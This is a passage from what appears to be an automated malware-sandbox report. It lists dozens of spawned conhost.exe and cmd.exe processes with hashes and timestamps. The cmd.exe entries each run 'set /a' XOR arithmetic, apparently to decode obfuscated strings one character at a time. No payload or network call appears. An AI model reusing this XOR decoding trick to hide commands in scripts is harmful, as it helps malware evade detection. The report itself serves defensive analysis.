                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:50
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:51
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "220^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:52
                                    Start time:13:38:25
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:53
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:54
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:55
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "195^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:56
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:57
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "133^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:58
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:59
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:60
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:61
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:62
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:63
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:64
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:65
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:66
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:67
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:68
                                    Start time:13:38:26
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:69
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:71
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:72
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "201^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:73
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:74
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "137^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:75
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:76
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:77
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:78
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:79
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:80
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:81
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:82
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:83
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:84
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:85
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:86
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:87
                                    Start time:13:38:27
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:88
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:89
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:90
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:91
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:92
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:93
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:94
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:95
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:96
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:97
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:98
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:99
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:100
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:101
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:102
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:103
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:104
                                    Start time:13:38:28
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "193^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:105
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:106
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:107
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:108
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "129^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:109
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:110
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "157^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:111
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:112
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "145^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:113
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:114
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd.exe /c set /a "216^177"
                                    Imagebase:
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:115
                                    Start time:13:38:29
                                    Start date:26/04/2024
                                    Path:C:\Windows\System32\Conhost.exe
                                    Wow64 process (32bit):
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:
                                    Has administrator privileges:
                                    Programmed in:C, C++ or other language
                                    Has exited:false

                                    General

                                    Target ID:116
                                    Start time:13:38:29
                                    Start date:26/04/2024
